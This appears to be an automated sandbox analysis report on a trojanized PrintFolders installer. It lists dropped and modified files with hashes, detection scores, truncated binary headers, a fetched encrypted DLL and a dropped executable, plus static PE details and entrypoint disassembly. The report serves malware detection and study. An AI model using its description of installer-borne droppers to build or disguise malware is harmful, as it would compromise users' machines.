C:\Program Files (x86)\PrintFolders\PrintFolders.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	modified
Size (bytes):	1990648
Entropy (8bit):	6.135022664098298
Encrypted:	false
SSDEEP:	49152:G0e7jkeRVgTU1Sw1pUfsWFQVNiTneoDsQ:gE2kYpUfs0QCe9Q
MD5:	2ABBE052537A4C836AFE8DBAC888F131
SHA1:	A0629A6130B7B7107681B033C0AFEE0C4EEB6CDB
SHA-256:	70717E7EE9E2A9EE5EF3804E3571B0DF6A1C2ABAF63179410A414C99705F9A47
SHA-512:	CD0361EF97CF7EB1CF248875FCBA471A2D5A9F82FA38EA15825EE60159B16465904116C1244D0CA21ED3B49895C2647653FF836B7A114FE5EC384C4E28962E0D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c..........'.................0.............@..........................`..............................................4........0...c...........................................................................................................text............................... ..`.rdata..n........ ..................@..@.data...@...........................@....tls......... ....... ..............@....rsrc....p...0...p...0..............@..@.rgw89..............................`...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\PrintFolders\Russian.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	4.508743257769972
Encrypted:	false
SSDEEP:	192:kxsrC3rSQgvlS7pEeHPmIOBaVeFSiLW70ygWr:csvGmIOBa5f
MD5:	4FB606EDBDE8EFB6D34E6E1BC5F677F1
SHA1:	F8F094064D107384E619DED1139932AA38476272
SHA-256:	A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
SHA-512:	5B34ECB87582FFC210CA4EED06C729979D7197191CF74EB3CDB59D0F629603C171D50B6D9351DEB7DD13F6FCBBD79F8A23ED0114BBD991520CA9BFA4EF10A44D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.............5...............5......Rich....................PE..L....SwO...........!.........P...............................................p............@.......................................... ..`M...........................................................................................................rdata..m...........................@..@.rsrc...`M... ...N..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\PrintFolders\is-0E5GB.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	RAGE Package Format (RPF),
Category:	dropped
Size (bytes):	3391
Entropy (8bit):	4.812121234949207
Encrypted:	false
SSDEEP:	96:FjjD9GrzqpptIaj6JGcnRH7aamJL4zUtWAbakj:FYrrawhbaVFtTuk
MD5:	A5E8094B0CBADE929AEE07F5DA5E9429
SHA1:	60BB56A380CD9126AC067AE39B262E28A22532CD
SHA-256:	F3AC2009C96EB3A42AFAEC7FA67D3A14E5E9E30819B543D572C9BEA790CFCAD1
SHA-512:	018D1963A0B45A731687C5811E6447911E9BC7285B25EE3BBAD95D4D9C23718EF4E9714714C8A68617EAE4F840FB3D76BC77B0C49A64346D9605CCF70592356C
Malicious:	false
Preview:	PRINTFOLDERS version 2.51b..Copyright (C) 2009-2012 Andrey Pivovarov. All rights reserved.....END USER LICENSE AGREEMENT....This license describes the conditions under which you may use version 2.51b of ..PrintFolders ("the program"). If you are unable or unwilling to accept these ..conditions in full, then, notwithstanding the conditions in the remainder of ..this license, you may not use the program at all.....The program is a full-functional software. The program never expires and may be ..used for any period of time. The program has no exclusive limitations and does ..not require registration, though you may register your copy of the program to ..support the authors and remove the nag screens.....You may copy and distribute verbatim copies of the program executable, in any ..medium, provided that you conspicuously and appropriately publish on each copy ..an appropriate copyright notice and disclaimer of warranty; keep intact all the ..notices that refer to this license and to the a

C:\Program Files (x86)\PrintFolders\is-2632S.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	4.508743257769972
Encrypted:	false
SSDEEP:	192:kxsrC3rSQgvlS7pEeHPmIOBaVeFSiLW70ygWr:csvGmIOBa5f
MD5:	4FB606EDBDE8EFB6D34E6E1BC5F677F1
SHA1:	F8F094064D107384E619DED1139932AA38476272
SHA-256:	A960C9DCD1D5C7B79F4FDD38D6F25299F4F7925555E381EA4AB6217681482F62
SHA-512:	5B34ECB87582FFC210CA4EED06C729979D7197191CF74EB3CDB59D0F629603C171D50B6D9351DEB7DD13F6FCBBD79F8A23ED0114BBD991520CA9BFA4EF10A44D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u.............5...............5......Rich....................PE..L....SwO...........!.........P...............................................p............@.......................................... ..`M...........................................................................................................rdata..m...........................@..@.rsrc...`M... ...N..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\PrintFolders\is-48N1K.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	669450
Entropy (8bit):	6.478399502986981
Encrypted:	false
SSDEEP:	12288:2h5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvJxOx:M5NoqWolrP837JzHvA6yknyWFxvJxOx
MD5:	CF680B53729F6E3059183D51F91D337D
SHA1:	4D6EB765BB4837F09283101490375DF5F68C8E37
SHA-256:	A3F8C832C69388A88E47DD8B612382F74D5131E8C710741EFB2410EC450BDF2D
SHA-512:	1F59A9A03485DFDB9E232F0D8B52CD864993FC25734E16DD2160190045626531685E81BDBCF0636EBA9F7CEDA9DA082A9AAD2DD4C5BFE165110731B7F89FCA51
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................d......t.............@..............................................@..............................$%......P+...................@...............................0......................................................CODE................................ ..`DATA................................@...BSS.....x................................idata..$%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc.......@......................@..P.rsrc...P+.......,..................@..P....................................@..P........................................................................................................................................

C:\Program Files (x86)\PrintFolders\is-5F7BS.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5403
Entropy (8bit):	4.918324842676727
Encrypted:	false
SSDEEP:	96:uUzxQ0Bz664UbxDcqEVFUz1BDzeRGH+QanjY3ZLBxdfC4INXM/gr53F8EPeHl9j4:uU1QyZ4e9cqEfUz1BD0GH+QGjYJBxdfY
MD5:	C8B211D81EB7D4F9EBB071A117444D51
SHA1:	43BF57BB0931EBED953FE17F937C1C7FF58A027C
SHA-256:	AFD6FEA6A792B722E45A6587F70334F30051798017F4A278508C7ED3FEEA80CC
SHA-512:	C7C558EB666B570A0B03D1E8941217673677A6AF1F7CE4C43BE77D1AA859AD8DF7B212CF778B03678DD451535C7A7B02FEB65F20B744A8E9C969DF633F79A2AB
Malicious:	false
Preview:	=====================.. History of Releases..=====================....Legend..------..[+] - added..[] - modified..[-] - bug fixed......Version 2.51b..-------------..[-] The output file path wasn't updated in certain circumstances..[-] Added the workaround for the modal message boxes bug in Wine....Version 2.51a..-------------..[+] Focus rectangle added for the "Go!" button..[+] Added program version to the setup info..[] A couple of interface optimizations..[-] "Check for updates" now should work under Wine....Version 2.51..------------..[+] The "Help" buttons now present in each dialog..[+] Russian user interface..[] Improved Wine compatibility..[-] One very elusive bug inherited from the early versions finally fixed..[-] Improved the "Check for updates" behavior..[-] Fixed several regressions and smaller bugs....Version 2.5..-----------..[+] Checking for updates on startup (registered users only)..[] Faster processing of large numbers of files..[*] Folders containing no files acc

C:\Program Files (x86)\PrintFolders\is-60UNK.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	118869
Entropy (8bit):	7.933172616287708
Encrypted:	false
SSDEEP:	1536:a8+b7UxVIBmVQVxSHmIKruCGFkw8dctBJcIFEvSrT3eoxNjT+YL/fe3iWP7:Z+b76wV3hCb86tBJc7SffxNjqO/qiWT
MD5:	204A5BF160646F9A55ED70AB6E1A07A6
SHA1:	5404AB219FA01C270ADC36303D447109503C4A4D
SHA-256:	CACDD2C8BFA4BAE33A16A10ED609F4841AC5C4C2FE481ED0FD8CB04BC8016BBD
SHA-512:	6AAFBAF8565BF57BF4CC9E8D5EEF947E32E0D1A962C0BB619A25C35C68B7AA24599C60CB1C1B108FC9F58A1F13FF80B66E1A4DA506BE2FFD2DD05331865DAA15
Malicious:	false
Preview:	ITSF....`..................\|.{.......".....\|.{......."..`...............x.......T.......................U...............ITSP....T...........................................j..].!......."..T...............PMGL................./..../#IDXHDR......./#ITBITS..../#STRINGS...>.../#SYSTEM..V.../#TOPICS....`./#URLSTR...Gw./#URLTBL....H./#WINDOWS.....D./$FIftiMain...g..8./$OBJINST...T.../author.htm...m.<./cmdline.htm...O.../ctxmenu.jpg...3..B./index.htm..'.y./interface.htm.. .^./logo.jpg...P..4./main.css...u.../PrintDir.hhc...).'./screenshot.jpg.....././shell.htm...~.Q.::DataSpace/NameList..<(::DataSpace/Storage/MSCompressed/Content..[...,::DataSpace/Storage/MSCompressed/ControlData.j.)::DataSpace/Storage/MSCompressed/SpanInfo.b./::DataSpace/Storage/MSCompressed/Transform/List.<&_::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/...i::DataSpace/Storage/MSCompressed/Transform/{7FC28940-9D31-11D0-9B27-00A0C91E9C7C}/InstanceData/ResetTable...P...........

C:\Program Files (x86)\PrintFolders\is-OK1CQ.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	data
Category:	dropped
Size (bytes):	1990648
Entropy (8bit):	6.13502190347102
Encrypted:	false
SSDEEP:	49152:v0e7jkeRVgTU1Sw1pUfsWFQVNiTneoDsQ:zE2kYpUfs0QCe9Q
MD5:	DE99B1E8819F3E7BD2265CDB39050B9C
SHA1:	FC3C8DDE6D6D01983B1888C3139AD37DED4ED2FE
SHA-256:	37343E82AD7BE281C2CB98A3B97DE2E5AD31BDFEB7850E5A54F07D124B96D4D6
SHA-512:	04B99842B22DD22AFCF5399B71915D0EEF0036581050AC6DE4320AEBFE81A0EA7FD1EC9ED79D98B4FD2D4704DD006D12F1B47869DAFC51EAC10096CF328F54BC
Malicious:	false
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....c..........'.................0.............@..........................`..............................................4........0...c...........................................................................................................text............................... ..`.rdata..n........ ..................@..@.data...@...........................@....tls......... ....... ..............@....rsrc....p...0...p...0..............@..@.rgw89..............................`...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\PrintFolders\unins000.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	InnoSetup Log PrintFolders {73D78C7A-78F2-476F-86FF-9025EA410908}, version 0x2a, 3813 bytes, 609290\user, "C:\Program Files (x86)\PrintFolders"
Category:	dropped
Size (bytes):	3813
Entropy (8bit):	4.504029461113114
Encrypted:	false
SSDEEP:	48:weNyMHLBv8iD86plmE6FoIN0hqkLVO3471qV/LDa0zA47brL1XLk:hrp8iD86p45oIyhqYOIh0No
MD5:	5CA9A255015A4BEF13CC4C4CB36429CA
SHA1:	C26147239E8EB7D5E47FF10808E94D91DACB2C1D
SHA-256:	E6A32D3F74C0E10502BD5D726A310B9AC7D7DB52E79F87728AD30110F580CED5
SHA-512:	070DA32A80D5C79807BE4579CEB958CCD33CE07080D35EFAC817A9DC5B4BC42FD2008A12764D774AB999834968F1F9206C5094685FE889B4DEE01671837E59C4
Malicious:	false
Preview:	Inno Setup Uninstall Log (b)....................................{73D78C7A-78F2-476F-86FF-9025EA410908}}.........................................................................................PrintFolders....................................................................................................................*...........%.................................................................................................................<........y........C....609290.user#C:\Program Files (x86)\PrintFolders.................. ..........Q.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..'...dll:kernel32.dll.CreateFileA.............#...dll:kernel32.dll.WriteFile...........!...dll:kernel32.dll.CloseHandle.......!...dll:kernel32.dll.ExitProcess.......$...dll:User32.dll.GetSystemMet

C:\Program Files (x86)\PrintFolders\unins000.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	669450
Entropy (8bit):	6.478399502986981
Encrypted:	false
SSDEEP:	12288:2h5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvJxOx:M5NoqWolrP837JzHvA6yknyWFxvJxOx
MD5:	CF680B53729F6E3059183D51F91D337D
SHA1:	4D6EB765BB4837F09283101490375DF5F68C8E37
SHA-256:	A3F8C832C69388A88E47DD8B612382F74D5131E8C710741EFB2410EC450BDF2D
SHA-512:	1F59A9A03485DFDB9E232F0D8B52CD864993FC25734E16DD2160190045626531685E81BDBCF0636EBA9F7CEDA9DA082A9AAD2DD4C5BFE165110731B7F89FCA51
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................d......t.............@..............................................@..............................$%......P+...................@...............................0......................................................CODE................................ ..`DATA................................@...BSS.....x................................idata..$%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc.......@......................@..P.rsrc...P+.......,..................@..P....................................@..P........................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\fuckingdllENCR[1].dll

Download File

Process:	C:\Program Files (x86)\PrintFolders\PrintFolders.exe
File Type:	data
Category:	dropped
Size (bytes):	94224
Entropy (8bit):	7.998072640845361
Encrypted:	true
SSDEEP:	1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
MD5:	418619EA97671304AF80EC60F5A50B62
SHA1:	F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
SHA-256:	EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
SHA-512:	F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
Malicious:	false
Preview:	...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.\|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..\|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=\|....'....[1.~.YB:./...A`...=..F..K...........

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\ping[1].htm

Download File

Process:	C:\Program Files (x86)\PrintFolders\PrintFolders.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	17
Entropy (8bit):	3.1751231351134614
Encrypted:	false
SSDEEP:	3:nCmxEl:Cmc
MD5:	064DB2A4C3D31A4DC6AA2538F3FE7377
SHA1:	8F877AE1873C88076D854425221E352CA4178DFA
SHA-256:	0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
SHA-512:	CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
Malicious:	false
Preview:	UwUoooIIrwgh24uuU

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\library[1].htm

Download File

Process:	C:\Program Files (x86)\PrintFolders\PrintFolders.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\count[1].htm

Download File

Process:	C:\Program Files (x86)\PrintFolders\PrintFolders.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\library[1].htm

Download File

Process:	C:\Program Files (x86)\PrintFolders\PrintFolders.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	4.226829458093667
Encrypted:	false
SSDEEP:	48:6Q5EWGg69eR+Xl4SH8u09tmRJ/tE/wJI/tZ/P8sB1a:32Gel4NP9tK2/wGXhHa
MD5:	9E5BA8A0DB2AE3A955BEE397534D535D
SHA1:	EF08EF5FAC94F42C276E64765759F8BC71BF88CB
SHA-256:	08D2876741F4FD5EDFAE20054081CEF03E41C458AB1C5BBF095A288FA93627FA
SHA-512:	229A9C66080D59B7D2E1E651CFF9F00DB0CBDC08703E60D645651AF0664520CA143B088C71AD73813A500A33B48C63CA1795E2162B7620453935A4C26DB96B21
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........o4...g...g...g).zg...g...g...g.&lg...g.&yg...gRich...g........PE..d...9TTB..........#...........................@..............................P...............................................................!..x............@..H.................................................................... ...............................text............................... ..`.rdata....... ......................@..@.data...,....0......................@....pdata..H....@......................@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-385TG.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-KU6HQ.tmp\is-QPTG8.tmp

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	658944
Entropy (8bit):	6.468629759056718
Encrypted:	false
SSDEEP:	12288:Oh5UooqWolrP837JzHvA6izJgnnyFNmayiAZrvJxO0:05NoqWolrP837JzHvA6yknyWFxvJxO0
MD5:	85B94E72C3F2D2B5464E2AAF3C9E242A
SHA1:	CE7CCAE5F50A990D059D59292D4A332979E162BA
SHA-256:	1441464FEEEF365573AF18802C464769B7D3107624FDE24604F57E386F97F1A7
SHA-512:	C0C27189989DB482BE9BDA5B6B8B1441BDC5E9B0F3A414CCAB4C4BE516E7F99E25717845361A5B196114502FAAAF21BEC7ACA91B497ACD2E2396F49C31850880
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................d......t.............@..............................................@..............................$%......P+...................@...............................0......................................................CODE................................ ..`DATA................................@...BSS.....x................................idata..$%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc.......@......................@..P.rsrc...P+.......,..................@..P....................................@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\uywwtiNQ.exe

Download File

Process:	C:\Program Files (x86)\PrintFolders\PrintFolders.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	6.20389308045717
Encrypted:	false
SSDEEP:	1536:bvUpDLxyxA14o3/M238r6+XfHAgbqmE8MpKdwuasZLUM7DsWlXcdyZgfmi:WDLZKa/MtXfHAgbqmEtxsfmyZgfmi
MD5:	3FB36CB0B7172E5298D2992D42984D06
SHA1:	439827777DF4A337CBB9FA4A4640D0D3FA1738B7
SHA-256:	27AE813CEFF8AA56E9FA68C8E50BB1C6C4A01636015EAC4BD8BF444AFB7020D6
SHA-512:	6B39CB32D77200209A25080AC92BC71B1F468E2946B651023793F3585EE6034ADC70924DBD751CF4A51B5E71377854F1AB43C2DD287D4837E7B544FF886F470C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................................................................9...........Rich............................PE..L....,?c.....................~......_.............@..........................`............@.....................................(....@.......................P..........8...............................@............................................text............................... ..`.rdata..dY.......Z..................@..@.data........ ......................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, InnoSetup self-extracting archive
Entropy (8bit):	7.991071631974842
TrID:	Win32 Executable (generic) a (10002005/4) 98.88% Inno Setup installer (109748/4) 1.08% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1488975
MD5:	2ed741014b8cdafd91a740432a3cffa1
SHA1:	3d65ac9a3d0950a55d4c7e4cb5a6fbfeab180cab
SHA256:	fc33189d3c146375f5742bbb0e82277e2b8ed3789d8feae27939e834b07ee8dc
SHA512:	a309386146699f4cfd48872f705cce681266c63af93d9e9347a79e940a6221ce6a3606e52f7afa8a4ca91e259c31f600bad43c851eca387941b4154fe69c6d3c
SSDEEP:	24576:hizo5TdlqnGpid2DCDeCSxDQrOAE/1MA5sLspIYJj85itIqSdgZIY7eCLxYi5:KSjiQeef2E/1MDQLJjHIqDNeVi5
TLSH:	2D65330EE623297CE08340B25F7A59584766BE240D782162FAF0A4F58D7FB85690F7D3
File Content Preview:	MZP.....................@.......................Inno'....G..............!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	a2a0b496b2caca72

Static PE Info

General

Entrypoint:	0x40968c
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:	da86ff6d22d7419ae7f10724a403dffd

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFD4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-1Ch], eax
call 00007FB90D3609BFh
call 00007FB90D361C6Ah
call 00007FB90D363E5Dh
call 00007FB90D363EA4h
call 00007FB90D3663F3h
call 00007FB90D3664E2h
mov esi, 0040BDE0h
xor eax, eax
push ebp
push 00409D71h
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 00409D27h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040B014h]
call 00007FB90D366E6Fh
call 00007FB90D366A2Eh
